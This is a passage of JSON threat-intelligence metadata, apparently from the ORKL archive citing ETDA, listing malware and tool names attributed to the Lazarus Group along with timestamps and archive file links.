			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434912,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2ee5e2315e76fdf355ed8d5272dfb84e9a94ccdd.pdf",
		"text": "https://archive.orkl.eu/2ee5e2315e76fdf355ed8d5272dfb84e9a94ccdd.txt",
		"img": "https://archive.orkl.eu/2ee5e2315e76fdf355ed8d5272dfb84e9a94ccdd.jpg"
	}
}